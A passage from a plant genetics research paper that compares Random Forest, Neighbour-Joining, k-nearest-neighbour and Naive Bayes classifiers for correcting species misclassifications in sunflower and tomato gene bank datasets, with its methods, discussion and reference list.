randomly as the species to mutate their identity to, all species were affected by these artificial misclassifications at similar rates. This random misclassification effect should be much easier for classifiers to mitigate than the more structural nature of misclassifications one would expect when two or more morphologically similar species are systematically confused. Performance on complete datasets To test whether the conclusions of the curated datasets would hold and would show generic value, we compared the performance of the classifiers on three unmodified complete datasets. For this purpose, we acquired an unbiased estimate of prediction accuracy of the supervised machine learners we acquired an unbiased prediction estimate through leave-one-out cross-validation or bagging. The distance-based methods classified the data as before. Additionally, classification performance was quantified by prediction accuracy per species [see Additional file 1]. These tables show 3-NN as the best performing classifier. The performance of 3-NN is consistent with the results of the curated datasets. As expected based on the results of the curated datasets, the performance of Random Forest improved when species were represented by more accessions. The overall difference between RF, NJ, and 1-NN, however, appears slight. Perhaps most surprising result is the extreme poor performance of Naive Bayes. It performed best in the resequenced tomato dataset, in which its correct classifications consist almost exclusively of the species with the largest representation, S. lycopersicum and S. habrochaites. Conversely, it misclassified every single one of the 100 H. annuus accessions, which suggests that species representation is not solely at the root of the poor performance. As expected based on the curated datasets, Random Forest performed best on the AFLP tomato dataset, which contained the fewest species represented by 4 or less accessions. There was no difference between the out-of-bag prediction accuracy, and the fraction of accessions that was correctly classified. This is unsuprising with forests with 10,000 trees in with relatively small datasets. The aim of this research was to identify the most reliable methods for genome-wide species classification of imperfectly classified datasets. We used methods that previously proved successful in DNA barcoding and invesigated their performance under varying rates of misclassification and species representation on genome-wide SNPs We then assessed their performance on three complete datasets. Here we reflect on the methodology used in this research, as well as specify the methodologies we recommend to the genetic resources community. To determine the effect of misclassification rate on classifier performance, misclassifications were simulated by randomly changing an accessions’ species to a random different species from the same dataset. This resulted in a reduced performance for all classifiers as the misclassification rate rose, yet surprisingly, the misclassification rate appeared to have little influence on the best classifier. Exceptions were observed for datasets with 4 or 8 accessions per species, but the difference in prediction accuracy was only minimal in these cases. It is possible that this effect (or lack thereof) is caused by the method used to induce misclassifications. Accessions to misclassify were selected randomly, and as such, all species were affected by these artificial misclassifications at similar rates. This effect might be much easier for classifiers to mitigate than the more structural nature of misclassifications one would expect when two or more morphologically similar species are systematically confused. Validity of outlier detection methods For the curation of the Helianthus datasets, potential misclassifications in a subset of sunflower species were identified based on either their outlying position in the neighbour-joining tree [Additional file 2], or their relatively small proximity to others of their class in a Random Forest [see Additional file 3]. We reexamined these potential misclassifications using the complete sunflower dataset. For this, we compared a priori classifications, and predictions of both Random Forest and 3-NN, the most reliable classification methods. The performance of the Random Forest outlier detection method was unexpectedly poor, as only two out of six (max148 and niv07) accessions marked as outliers were actually re-classified by Random Forest and 3-NN. Comparison of suspected outliers with non-outliers revealed that considerably fewer reads were generated for outliers (median 1.0 million vs 2.4 million). This strongly suggests Random Forest used the number of imputed values to distinguish outliers from non-outliers. We used the most common allele at each locus to impute missing values, which in this case is likely the allele belonging to Helianthus annuus, which is represented by the vast majority of the accessions (Table 2). This way, we likely introduced Helianthus annuus alleles in accessions that were not Helianthus annuus, which led to their relative dissimilarity to others of their species. Interestingly, Random Forest was robust enough to confirm the a priori classifications despite this unfortunate artefact of the imputation method. This finding shows both the robustness of Random Forest classification, but also the sensitivity of the Random Forest outlier detection technique. Still, we do not recommend using Random Forest outlier detection technique for datasets with missing values imputed using the most common allele at each unknown locus, because the combination seems especially prone to false positives. The performance of NJ-based outlier detection fared much better. All accessions marked as outlying, with the exception of pet02, were found to be a different species by Random Forest and 3-NN classification. At first glance [see Additional file 1] pet02 seems distant from the cluster of other Helianthus petiolaris, but rotation of subtrees could position it much closer. How close is close enough to not be considered an outlier? This is a technique that uses human judgment, and this accession shows that interpreting phylogeny through trees can be rather tricky. Instead of this technique, we recommend using classification methods as outlined in the section "Practical Recommendations". Challenges in species classification Some of the species represented in the datasets are notably harder to classify than others with similar species representation, tomato species S. corneliomulleri and S. peruvianum senso stricto in particular. Nearly all classification mistakes involving these species, mixed up the two (Table 3). These are two of four species into which S. peruvianum sensu lato was recently split [51, 52]. Peralta et al. describe their approach towards this delineation as combining morphological, molecular, and ecological data, as well as having relied on clear morphological discontinuities to define entities. However, none of the strict consensus trees, based on either GBSSI gene sequences, AFLP data, or morphological characters presented by Peralta et al. show delineation between these two species. This finding has since then been reproduced several times [43, 53, 54]. Moreover, no significant difference between the environments S. corneliomulleri and S. peruvianum s.s. inhabit was found either . This lack of delineation clearly affected distance-based methods 1-NN and NJ, whereas 3-NN appears a bit more succesful. Peralta et al. cite incomplete lineage sorting as explanation, a characteristic which would indeed foil distance-based methods such as phylogenetic trees, but should have left a supervised machine learner like RF mostly unaffected. Random Forest, however, was not able to distinguish these species any better than 3-NN. Conversely though similarly, a recent study on gene flow between sunflower species H. petiolaris and H. neglectus found it was unlikely that these two populations represent two distinct isolated gene pools . The authors argued therefore that the populations currently recognized as H. neglectus, do not warrant recognition as a distinct species but should instead be recognized as a subspecies of H. petiolaris. Despite this finding, RF, NJ, and 3-NN distinguished H. petiolaris and H. neglectus with success (Table 2). While the sample sizes of this experiment are insufficient to draw conclusions, these findings suggest it might be fruitful to use classification methods alongside statistical methods when testing whether populations possess distinctive qualities. The variable success of Naive Bayes When comparing Table 4 with Table 3, it is evident that the prediction success of Naive Bayes is highly variable. Comparison of its performance on Solanum lycopersicum (Additional file 4) and Helianthus annuus (Additional file 5) suggests that this variability is not solely due to species representation. Rish et al. (2001) show that Naive Bayes reaches its best performance in two opposite cases: completely independent features and functionally highly dependent features . These cases might translate to these optimal cases: classification of a trait unrelated to lineage (completely independent), or classification in species with very low intraspecific diversity (highly dependent). This hypothesis would be consistent with a good classification performance on S. lycopersicum, as the accessions that represent it are all cultivated material and have very low diversity, and a bad performance on Helianthus annuus, the progenitor of cultivated sunflower, which has one of the highest rates of genetic diversity among wild sunflowers . Options for marker selection There are no definite guidelines on how best to select markers from resequenced data sets and reduce them to a computationally more manageable number. We briefly tested two different strategies, namely (1) applying a strict filter to select only what one would perceive as high quality markers, and (2) randomly thinning the markers to a desired number. In the resequenced tomato data set, we found that filtering the markers (as opposed to thinning) led to a great decrease in classifier performance (median prediction accuracy across classifiers of 0.91 vs. 0.73). In the resequenced sunflower dataset we found that the effect was opposite (0.82 vs. 0.90). By testing both strategies and choosing the marker selection with the best results, we were able to achieve good prediction accuracy for all complete datasets. We therefore believe these strategies to be sufficiently sound for use in species classification. These strategies can be implemented using command line variant filtering tools such as VCFTools or Plink (which are very fast but currently only available on Linux or MacOS), or on Windows machines using R [59, 60] or Python. Additionally, other options exist for marker selection, including using only variant sites present in orthologous genes , variant-pruning based on linkage disequilibrium , or even reference free comparisons [62,63,64,65]. Reference free strategies are expected to be less successful as genome coverage drops and will require the raw sequence reads (fastq files) instead of variant call files, but may otherwise be very effective in species lacking a reference genome. Among reference free methods, DiscoSNP++ in particular prides itself on its user-friendliness, as it needs relatively little RAM memory and computational time, and could therefore be run on a desktop computer. Overall, the choice for any particular method may be constrained by user expertise, computational capacity, sequencing depth and quality, and the availability of a suitable reference genome. Gene banks play a crucial role in securing genetic diversity for research and breeding, now and in the future. The collection and correct classification of crop wild relatives is an important aspect of this work. Classifying accessions based on morphological features alone, however, is time-consuming and error prone. As collections of crop wild relatives are increasingly genotyped and sequenced, this creates an excellent opportunity for gene banks to improve the quality of their documentation by identifying and correcting misclassifications. Gold standard datasets, however, are lacking for many crops and crop wild relatives. As such, the ambitious premise of this work was to find the best method for species classification, regardless of species, inclusion of wild relatives, or genotyping method, while working with imperfectly classified datasets. We found that a conservative variety of 3-Nearest Neighbours is particularly suited to improve the quality of a bad dataset, and is a significant improvement over Neighbour-Joining, which represents the current phylogenetic methodology to address misclassifications. Based on its performance on the three complete datasets, we feel confident that this variety of 3-Nearest Neighbours will reliably perform well on a large variety of datasets. There are still more avenues to explore regarding the use and improvement of bad training data in species classification tasks, but based on this research, we have formulated practical recommendations that can be used immediately by curators of genetic resources collections. Furthermore, based on these findings and recommendations, a simple software tool could be developed to assist plant genetic resources curators in identifying potential misclassifications, using the current classifications and genomic data. Such a tool could eventually be developed further to study other descriptors, such as disease susceptibility, and to predict the likelihood of accessions being resistant and the likelihood of the prediction being correct. This has the potential to increase the quality of gene bank documentation tremendously, and thus increase the value of these priceless plant genetic resources. To identify the flaws of various classification methods, we used curated but highly diverse datasets of sunflower. We artificially varied species representation (number of accessions per species) and misclassification rate (fraction of misclassified accessions) in these data sets, and used five different classification methods to correct the misclassifications introduced. We then verified the generic value of these methods by applying them to three complete datasets. We selected classification methods based on their success in DNA barcoding studies, and aimed for diversity in methodology. This resulted in the selection of Random Forest, NJ, k-NN, and Naive Bayes. The first three were the most promising methods in the comparison study of Austerlitz et al. , whereas Naive Bayes was one of the best performers in the study of Weitschek et al. . These methods broadly constitute three types of approaches: distance methods (k-NN), phylogenetic methods (NJ), and supervised machine learners (Random Forest, Naive Bayes). In these comparisons, NJ will be representative of the commonly used methodology to correct misclassifications in diverse datasets, as these are currently based on phylogenetic analysis. As genebanks often work with species for which there are currently no gold standard classified datasets, the aim of this research is to find classification methods that can learn from bad training data, in such a way that they can improve the quality of the same data by reducing the number of misclassifications. We use a curated dataset with artificially introduced misclassifications to verify if models can actually improve the quality of the data, or if the models will output the same or even worse quality data when working with a bad training dataset. Random Forest is an algorithm that combines hundreds or thousands of decision trees, trains each one on a slightly different set of observations through bootstrapping, and splits each decision node based on a random subset of features (e.g. molecular markers). The forest will classify new samples by funneling them down all decision trees, and adopting the classification proposed by the majority of the trees . This averaging of predictions (called bagging, or bootstrap aggregating), combined with the bootstrapping of the observations improves the stability and accuracy of predictions, and helps to avoid over-fitting. To implement the Random Forest algorithm, R package ranger was used. This package is true to the original algorithm, but boosts computational efficiency through parallel processing. ranger was run with replacement with 10,000 trees, the default mtry value of √p, and the gini impurity split rule. Samples were classified by ranger internally, by only using the trees each sample was out of bag for. This means that each sample was effectively classified by 0.368 × 10,000 = 3,680 trees, hence the high number of trees initially chosen. Because Random Forest does not allow for any missing data, values were imputed with the na.roughfix function from R package RandomForest . This method replaces the missing allele at each site with the most common one. Although this imputation method is not very sophisticated, it is very fast, makes no assumptions about the data, and works independently of any class information. Neighbour-Joining (NJ) is a phylogenetic clustering method that constructs a tree from a distance matrix . This method was implemented using the functions dist.gene and nj from R package APE , and additionally a script to classify the samples based on the constructed NJ tree. This script was based on the description of Austerlitz et al., in their paper comparing various classification methods for DNA barcode analysis . The distance matrix was computed with dist.gene with pairwise deletion enabled. With this option, dist.gene constructs a distance matrix by determining the number of divergent sites through pairwise comparison, and discarding the markers for which data of one or both samples is missing. The classification script reads the NJ tree and assigns the query sample the majority species of the smallest subtree it occurs in. If no majority is found, the process is repeated with the second-to-one smallest subtree the query occurs in. If no majority species emerges in this subtree either, the query is determined to be ambiguous. k-nearest neighbours classification We used two different Nearest Neighbours strategies, which vary in k number and distance measure. The first strategy is 1-Nearest Neighbour (1-NN), which assigns the query sample to the species of the most similar sample within the examined dataset. This strategy causes a problem when two nearest neighbours don’t share the same identity. Take, for example, a case of 2 neighbouring samples that are the same species, one a priori classification may be correct, and the other incorrect. 1-NN will assign the correct identity to the misclassified sample, but then go on and assign the incorrect identity to the other sample. Nevertheless, we included 1-NN to put the results of other classification methods into perspective, because we consider a method that cannot outperform 1-NN unsuitable for implementation. To our knowledge, there is no R package that offers nearest neighbour classification with built-in leave-one-out cross-validation, so a custom function was written that computes the distance matrix only once, and then classifies the accessions while ignoring each query sample’s a priori classification. Distance between samples was determined by APE’s dist.gene function with pairwise deletion enabled. dist.gene performs a pairwise comparison for all samples and presents a conservative estimate of the number of divergent sites by ignoring all sites with missing values for one or both samples. The most similar sample is then selected and its species identity is assigned to the query sample. The second strategy is a conservative variety of 3-Nearest Neighbours (3-NN), which includes the query sample itself among the three selected neighbours. The inclusion of the query sample amoung the neighbours increases the burden of evidence to overturn the a priori classification, as only one neighbour is needed to confirm it, while two are needed to overturn it in a majority vote. Simultaneously, this decreases the bare minimum of accessions a species needs for unambiguous classification from 3 to 2. If there are ties for the third nearest sample, all candidates are included in the vote. If no majority is reached, the sample is classified as ambiguous. 3-NN was implemented using the knn function from R package class, using k = 3, l = 2, and use.all = TRUE. This function uses Euclidian distance to determine similarity instead of the number of divergent sites, as used for 1-NN and NJ. Because this function does not allow missing data, missing data were imputed in the same manner as for Random Forest. Naive bayes classifier The Naive Bayes classifier is a probabilistic classifier based on Bayes’ theorem. Bayes’ theorem describes the probability of example E being a member of class C, based on prior knowledge of prediction features that might be related to this class. For example, if cancer is related to age, then with Bayes’ theorem, a person’s age can be used to more accurately assess the likelihood of them having cancer, compared to assessing the probability of cancer without this knowledge. The "naive" aspect of this classifier results from its assumption that each predictor is independent from all others. In our study, this amounts to disregarding linkage between markers. The independence assumption of Naive Bayes is rarely warranted, but works surprisingly well in practice. Zhang (2004) explored potential causes of this paradox and showed that Naive Bayes does not need true independence of predictors to perform optimally, but rather demands an even distribution of dependencies in classes, or dependencies that cancel each other out . In DNA barcode classification, Naive Bayes has been found successful . The authors claim that ignoring dependence between predictors can lead to poorly estimated class probabilities, but will still result in correct classifications if the correct group is the most probable. The Naive Bayes model was created with the naiveBayes function from R package e1071 , using a value of 1 for Laplace smoothing. Predictions were made using the predict function from e1071. The Naive Bayes classifier does not require missing data to be absent, but performs much better with a well-imputed dataset. Missing data were therefore handled in the same manner as for Random Forest, i.e. by imputing the most common allele at each site. The datasets selected for the evaluation of classification methods were chosen based on their high number of crop wild relatives included, as well as their respective differences in species representation. The characteristics of the datasets are summarized in Table 5. The dataset chosen to create the curated datasets is a resequenced sunflower dataset , which includes 22 wild sunflower species. Of these species, 8 are represented by 10 or more accessions. The median number of accessions per species is 6.5. To simplify analyses and boost computation speed, the variant sites were filtered for > 80% call rate, > 1% minor allele frequency, no indels, and a minimum of 200,000 reads per accession using VCFTools version 0.1.15 . Additionally, individual genotypes were filtered to remove calls with < 5 reads. After filtering, 15,285 out of 545,531 sites, and 280 out of 288 accessions remained. The tomato dataset was resequenced with a mean coverage of 36-fold, and includes accessions from 13 different species . The dataset also contains raw reads and variant call files from accessions that were excluded from the original publication. These were excluded when further analysis revealed admixed ancestry (R Finkers, personal communication, February 7, 2019). We choose only to use the accessions of which the species identity was verified, and merged all single sample files using VCFTools. Due to the high coverage of this dataset, it was especially important to reduce the number of variant sites for computational efficiency. To reduce the number of variant sites to a maximum of 100,000, we briefly tested two strategies namely (1) applying a strict filter (> 80% call rate, > 1% minor allele frequency, and no indels, which kept 1.9 million out of 71.1 million variant sites) and subsequently randomly thinning to 100,000 using Plink2.0 , and (2) randomly thinning on all unfiltered 71.1 million variant sites using Plink2.0. We found that, for this dataset, median prediction accuracy markedly improved across classifiers (0.91 vs. 0.73) when applying the second strategy versus the first one. We therefore proceeded with this dataset using strategy 2. The resequenced tomato dataset includes 13 different species and features a major class imbalance, with 50 out of 80 accessions belonging to Solanum lycopersicum. Among the species with less representation are S. corneliomulleri and S. galapagense, both represented by 1 accession, and seven more species that are represented by 2 accessions. This leads to a median species size of only 2. The distribution of species in the AFLP tomato dataset by Zuriaga et al. is less extreme . It includes 14 different species, and 3 hybrid accessions. S. pimpinellifolium is represented by 26 accessions, and S. galapagense by 2. The other species lie somewhere in between (median = 9). The AFLP marker data were received from Zuriaga upon request. We received present/absent scoring for 245 markers in Genetix format, a format actually designed for diploid data. Thirteen of these markers had heterozygous data, which is odd because AFLPs are dominant. Zuriaga agreed these were erroneous, but retrieving the data as used for analysis 10 years ago proved difficult (personal communication, June 27, 2019). We removed all markers with heterozygous data, as well as another 13 markers with a minor allele frequency below 1%. This resulted in 219 markers for analysis. The accession numbers of the accessions used, their a priori classifications, and the predictions of all classifiers for the resequenced tomato dataset, the sunflower dataset, and the AFLP tomato dataset can be found in Additional files 4, 5, and 6, respectively. Treatment of curated sunflower dataset The number of informative SNPs present in a given genomic dataset may vary greatly depending on genotyping technique, data processing, and not in the least, crop properties. To investigate the effects of species representation and misclassification rate (and isolate them as much as possible), we selected a single expansive dataset to artificially vary species representation and misclassification rate. Firstly, the accessions of all species with less than 10 accessions were removed. The remaining material was imported into R . To avoid the confounding effect of a priori misclassifications, the dataset was screened for outliers using two very different techniques: visual inspection of a neighbour-joining tree and a Random Forest-based outlier detection method . For the latter, functions randomForest and outlier from R package Random Forest were used. First Random Forest was run with ntree = 50,000 and proximity set to TRUE to obtain a proximity matrix of the data. This matrix describes the similarity of two individuals by counting how often they land in the same terminal node in a tree. With this matrix and the original classifications, the outlier function then determines which individuals have small proximities to all other cases in their class, relative to the proximities these cases have to each other. Visual inspection of the neighbour-joining tree revealed 4 potential misclassifications accessions (Additional file 2). Using the recommended threshold of 10, the Random Forest outlier detection method flagged 6 accessions as potential outliers (Additional file 3). These accessions were all excluded from further analysis, as were the remaining H. exilis accessions because their group size dropped below 10. After this selection, 199 accessions from 8 species remained. From this material, 10, 8, 6, 4, and 2 samples were randomly selected from each species. These populations were used to examine model performance under varying numbers of species representation. Simulation of misclassifications The goal of this part of the research is to determine which methods are most suited to correct misclassifications in genomic datasets, without the use of a gold standard dataset. To simulate these misclassifications, the species names of 6.25%, 12.5% and 18.75% of the samples were randomly altered to a random different species name from the dataset. These random alterations were introduced 5,000 times for each misclassification rate and each species representation. Each time, classifiers made predictions based on the same sets of a priori (mis)classifications. A total of 75,000 datasets were analyzed, comprising 5 different levels of species representation, 3 rates of misclassification and 5,000 replications. Classifier comparison on curated datasets To quantify classifier performance, we used prediction accuracy. Prediction accuracy is a simple and intuitive metric, defined as the number of correct predictions, divided by the number of samples. Ambiguous predictions were excluded from the calculation. It must be noted however, that prediction accuracy as a summary metric must be treated with caution, as this metric is very sensitive to strong variation in the number of accessions per species. Good alternatives to prediction accuracy in imbalanced datasets are Matthews correlation coefficient (for binary predictions) and the lesser known RK statistic (for multiclass predictions) [46, 47]. In this case we were able to use prediction accuracy because we consistently represented all species by the same number of accessions in the curated datasets. To test the null hypothesis that all classifiers show identical performance under all circumstances, prediction accuracies were grouped by misclassification rate and sample size, and tested using Friedman Aligned Ranks. Like the Friedman test, this is a non-parametric test that makes no assumptions about the distribution or variance of the data, and hence was considered appropriate to test the null hypothesis . Friedman Aligned Ranks has been shown to perform better than the Friedman test when the number of classifiers is low, i.e. no more than 4 or 5 . To correct for multiple testing, each p-value was corrected with the Finner test. This test has greater power than the conservative Bonferroni-Dunn test, and similar power to Holm, Hochberg, Hommel, Holland, and Rom, while having a simpler design . If the adjusted p-value was below 0.05, it was followed up by a multiple comparison with the classifier with the highest mean accuracy as control. These statistical tests and comparisons were performed in R, using R package scmamp which has been especially developed for statistical comparison of multiple algorithms. Classifier comparison on complete datasets For the comparison of the complete datasets, we also used prediction accuracy. To prevent bias towards classifiers that perform well on large classes, we not only looked at the overall prediction accuracy, but also at the performance per species. Prediction accuracy per species is defined as the number of correct predictions per species, divided by total number of accessions belonging to the species. Ambiguous predictions, as are sometimes made by NJ and 3-NN, are again excluded from the calculation. The complete datasets are used without any modification, as their purpose is only to confirm whether the conclusions of the curated datasets hold, and appear generalizable. For the supervised machine learners (RF and NB) we acquired an unbiased estimate of prediction. We used the out-of-bag prediction accuracy for Random Forest as estimate, and used leave-one-out as a sampling strategy for Naive Bayes. Availability of data and materials The resequenced sunflower data used for this study are available from the Sunflower Genome Database: https://sunflowergenome.org/diversity/. The sequence reads and associated analyses of the resequenced tomato data used for this study are available in the European Nucleotide Archive (http://www.ebi.ac.uk/ena/) under accession number PRJEB5235. The AFLP marker data of tomato used for this study were received from Zuriaga. The authors have permission to redistribute this data upon request. All data generated during this study are included in this published article and its supplementary information files. Crop wild relatives FAO. The Second Report on the State of the World’s Plant Genetic Resources for Food and Agriculture. Rome, 2010, p. 87. Hajjar R, Hodgkin T. The use of wild relatives in crop improvement: a survey of developments over the last 20 years. Euphytica. 2007;156(1–2):1–3. Ribaut JM, Hoisington D. Marker-assisted selection: new tools and strategies. Trends Plant Sci. 1998;3(6):236–9. Kaplan Z. Phenotypic plasticity inPotamogeton (Potamogetonaceae). Folia Geobotanica. 2002;37(2):141–70. Široký P, Fritz U, Türkozan O, Wink M, Lehmann J, Mazanaeva L, Auer M, Kami H, Hundsdörfer A. Phenotypic plasticity leads to incongruence between morphology-based taxonomy and genetic differentiation in western Palaearctic tortoises (Testudo graeca complex; Testudines, Testudinidae). Amphibia-Reptilia. 2007;28(1):97–121. Barbuto M, Galimberti A, Ferri E, Labra M, Malandra R, Galli P, Casiraghi M. DNA barcoding reveals fraudulent substitutions in shark seafood products: the Italian case of “palombo”(Mustelus spp). Food Res Int. 2010;43(1):376–81. Hebert PD, Cywinska A, Ball SL, Dewaard JR. Biological identifications through DNA barcodes. Proc R Soc Lond Ser B Biol Sci. 2003;270(1512):313–21. Adamowicz SJ. International Barcode of Life: Evolution of a global research community. Genome. 2015 Aug 17;58(5):151–62. Ratnasingham S, Hebert PD. BOLD: The Barcode of Life Data System (http://www.barcodinglife.org). Molecular Ecology Notes. 2007 May;7(3):355–64. DeSalle R, Egan MG, Siddall M. The unholy trinity: taxonomy, species delimitation and DNA barcoding. Philos Trans R Soc B Biol Sci. 2005 ;360(1462):1905–16. Hebert PD, Penton EH, Burns JM, Janzen DH, Hallwachs W. Ten species in one: DNA barcoding reveals cryptic species in the neotropical skipper butterfly Astraptes fulgerator. Proc Natl Acad Sci. 2004;101(41):14812–7. Hebert PD, Stoeckle MY, Zemlak TS, Francis CM. Identification of birds through DNA barcodes. PLoS Biol. 2004;2(10):e312. Clare EL, Lim BK, Fenton MB, Hebert PD. Neotropical bats: estimating species diversity with DNA barcodes. PLoS ONE. 2011;6(7):e22648. Ward RD, Zemlak TS, Innes BH, Last PR, Hebert PD. DNA barcoding Australia’s fish species. Philos Trans R Soc B Biol Sci. 2005;360(1462):1847–57. Wang G, Li C, Guo X, Xing D, Dong Y, Wang Z, Zhang Y, Liu M, Zheng Z, Zhang H, Zhu X. Identifying the main mosquito species in China based on DNA barcoding. PLoS ONE. 2012 Oct 10;7(10):e47051. Kress WJ, Erickson DL. A two-locus global DNA barcode for land plants: the coding rbcL gene complements the non-coding trnH-psbA spacer region. PLoS ONE. 2007 Jun 6;2(6):e508. Eberhardt U. Methods for DNA barcoding of fungi. In: DNA barcodes. Humana Press, Totowa, NJ. 2012. p. 183–205 Evans N, Paulay G. DNA barcoding methods for invertebrates. In: Barcodes DNA, editor. Humana Press. Totowa: NJ; 2012. p. 47–77. Vences M, Nagy ZT, Sonet G, Verheyen E. DNA barcoding amphibians and reptiles. In: Barcodes DNA, editor. Humana Press. Totowa: NJ; 2012. p. 79–107. Kress WJ, Erickson DL, Jones FA, Swenson NG, Perez R, Sanjur O, Bermingham E. Plant DNA barcodes and a community phylogeny of a tropical forest dynamics plot in Panama. Proc Natl Acad Sci. 2009 Nov 3;106(44):18621–6. Kress WJ, García-Robledo C, Uriarte M, Erickson DL. DNA barcodes for ecology, evolution, and conservation. Trends Ecol Evol. 2015 Jan 1;30(1):25–35. Cohen WW. Fast effective rule induction. In: Machine Learning Proceedings 1995. Morgan Kaufmann. 1995 Jan 1. p. 115–123. Bertolazzi P, Felici G, Weitschek E. Learning to classify species with barcodes. BMC Bioinformatics. 2009 Nov 1;10(S14):S7. Ross HA, Murugan S, Sibon Li WL. Testing the reliability of genetic methods of species identification via simulation. Syst Biol. 2008 Apr 1;57(2):216–30. Anderson MP, Dubnicka SR. A sequential naive Bayes classifier for DNA barcodes. Stat Appl Genet Mol Biol . 2014 Aug 1;13(4):423–34. Austerlitz F, David O, Schaeffer B, Bleakley K, Olteanu M, Leblois R, Veuille M, Laredo C. DNA barcode analysis: a comparison of phylogenetic and statistical classification methods. BMC Bioinformatics. 2009 Nov;10(14):S10. Weitschek E, Fiscon G, Felici G. Supervised DNA Barcodes species classification: analysis, comparisons and results. BioData Mining. 2014 Dec;7(1):4. van Velzen R, Weitschek E, Felici G, Bakker FT. DNA barcoding of recently diverged species: relative performance of matching methods. PLoS ONE. 2012 Jan 17;7(1):e30490. Monaghan MT, Balke M, Pons J, Vogler AP. Beyond barcodes: complex DNA taxonomy of a South Pacific Island radiation. Proc R Soc B Biol Sci. 2005 Dec 19;273(1588):887–93. Nelson LA, Wallman JF, Dowton M. Using COI barcodes to identify forensically and medically important blowflies. Med Vet Entomol. 2007 Mar;21(1):44–52. Whitworth TL, Dawson RD, Magalon H, Baudry E. DNA barcoding cannot reliably identify species of the blowfly genus Protocalliphora (Diptera: Calliphoridae). Proc R Soc B Biol Sci. 2007 May 1;274(1619):1731–9. Breiman L. Random forests. Machine Learn. 2001 Oct 1;45(1):5–32. Wright MN, Ziegler A. ranger: A fast implementation of random forests for high dimensional data in C++ and R. arXiv preprint arXiv:1508.04409. 2015 Aug 18. Liaw A, Wiener M. Classification and regression by randomForest. R News. 2002 Dec 3;2(3):18–22. Saitou N, Nei M. The neighbor-joining method: a new method for reconstructing phylogenetic trees. Mol Biol Evol. 1987 Jul 1;4(4):406–25. Paradis E, Claude J, Strimmer K. APE: analyses of phylogenetics and evolution in R language. Bioinformatics. 2004 Jan 22;20(2):289–90. Zhang H. The optimality of naive Bayes AA. 2004;1(2):3. Meyer D, Dimitriadou E, Hornik K, Weingessel A, Leisch F, Chang CC, Lin CC, Meyer MD. Package ‘e1071’. The R Journal. 2019 Jun 5. Baute GJ. A genomic survey of wild Helianthus germplasm clarifies phylogenetic relationships and identifies population structure and interspecific gene flow. In: Genomics of sunflower improvement: From wild relatives to a global oil seed (Doctoral dissertation, University of British Columbia). 2015. Danecek P, Auton A, Abecasis G, Albers CA, Banks E, DePristo MA, Handsaker RE, Lunter G, Marth GT, Sherry ST, McVean G. The variant call format and VCFtools. Bioinformatics. 2011 Jun 7;27(15):2156–8. Tomato Genome Sequencing Consortium, Aflitos S, Schijlen E, de Jong H, de Ridder D, Smit S, Finkers R, Wang J, Zhang G, Li N, Mao L. Exploring genetic variation in the tomato (Solanum section Lycopersicon) clade by whole‐genome sequencing. The Plant Journal. 2014 Oct;80(1):136–48. Chang CC, Chow CC, Tellier LC, Vattikuti S, Purcell SM, Lee JJ. Second-generation PLINK: rising to the challenge of larger and richer datasets. Gigascience. 2015 Dec;4(1):7. Zuriaga E, Blanca J, Nuez F. Classification and phylogenetic relationships in Solanum section Lycopersicon based on AFLP and two nuclear gene sequences. Genet Resour Crop Evol. 2009 Aug 1;56(5):663–78. R Core Team. R: A language and environment for statistical computing. 2013. Breiman, L: Manual for Setting Up, Using, and Understanding Random Forest V4.0. https://www.stat.berkeley.edu/~breiman/Using_random_forests_v4.0.pdf (2003). Accessed 21 Jan 2020. Boughorbel S, Jarray F, El-Anbari M. Optimal classifier for imbalanced data using Matthews Correlation Coefficient metric. PLoS ONE. 2017 Jun 2;12(6):e0177678. Gorodkin J. Comparing two K-category assignments by a K-category correlation coefficient. Comput Biol Chem. 2004 Dec 1;28(5–6):367–74. Demšar J. Statistical comparisons of classifiers over multiple data sets. Journal of Machine Learning Research. 2006;7(Jan):1–30. García S, Fernández A, Luengo J, Herrera F. Advanced nonparametric tests for multiple comparisons in the design of experiments in computational intelligence and data mining: Experimental analysis of power. Inf Sci. 2010 May 15;180(10):2044–64. Calvo B, Santafé Rodrigo G. scmamp: Statistical comparison of multiple algorithms in multiple problems. The R Journal, Vol. 8/1, Aug. 2016. 2016. Raduski A, Rieseberg L, Strasburg J. Effective population size, gene flow, and species status in a narrow endemic sunflower, Helianthus neglectus, compared to its widespread sister species, H. petiolaris. International Journal of Molecular Sciences. 2010 Feb;11(2):492–506. Peralta IE, Knapp S, Spooner DM. New species of wild tomatoes (Solanum section Lycopersicon: Solanaceae) from Northern Peru. Syst Bot. 2005 Apr 1;30(2):424–34. Peralta IE, Spooner DM, Knapp S. Taxonomy of wild tomatoes and their relatives (Solanum sect. Lycopersicoides, sect. Juglandifolia, sect. Lycopersicon; Solanaceae). Systematic Botany Monographs. 2008;84. Rodriguez F, Wu F, Ané C, Tanksley S, Spooner DM. Do potatoes and tomatoes have a single evolutionary history, and what proportion of the genome supports this history? BMC Evol Biol. 2009 Dec;9(1):191. Labate JA, Robertson LD, Strickler SR, Mueller LA. Genetic structure of the four wild tomato species in the Solanum peruvianum sl species complex. Genome. 2014 May 5;57(3):169–80. Nakazato T, Warren DL, Moyle LC. Ecological and geographic modes of species divergence in wild tomatoes. Am J Bot. 2010 Apr;97(4):680–93. Rish I. An empirical study of the naive Bayes classifier. In: IJCAI 2001 Workshop on Empirical Methods in Artificial Intelligence 2001 Aug 4 (Vol. 3, No. 22, pp. 41–46). Baute GJ, Owens GL, Bock DG, Rieseberg LH. Genome-wide genotyping-by-sequencing data provide a high-resolution view of wild Helianthus diversity, genetic structure, and interspecies gene flow. Am J Bot. 2016 Dec;103(12):2170–7. Knaus BJ, Grünwald NJ. vcfr: a package to manipulate and visualize variant call format data in R. Mol Ecol Resourc. 2017 Jan;17(1):44–53. Obenchain V, Lawrence M, Carey V, Gogarten S, Shannon P, Morgan M. VariantAnnotation: a Bioconductor package for exploration and annotation of genetic variants. Bioinformatics. 2014 Mar 28;30(14):2076–8. Pedersen BS, Quinlan AR. cyvcf2: fast, flexible variant analysis with Python. Bioinformatics. 2017 Jun 15. Vinga S, Almeida J. Alignment-free sequence comparison—a review. Bioinformatics. 2003 Mar 1;19(4):513–23. Leggett RM, MacLean D. Reference-free SNP detection: dealing with the data deluge. BMC Genomics. 2014 May;15(4):S10. Melo AT, Bartaula R, Hale I. GBS-SNP-CROP: a reference-optional pipeline for SNP discovery and plant germplasm characterization using variable length, paired-end genotyping-by-sequencing data. BMC Bioinformatics. 2016 Dec;17(1):29. Peterlongo P, Riou C, Drezen E, Lemaitre C. DiscoSnp++: de novo detection of small variants from raw unassembled read set (s). BioRxiv. 2017 Jan;1:209965. This work was part of the Fundamental Research Programme ‘Circular and Climate Neutral’ (KB-34-013-001) and the “Innovations in PGR Collection Management” 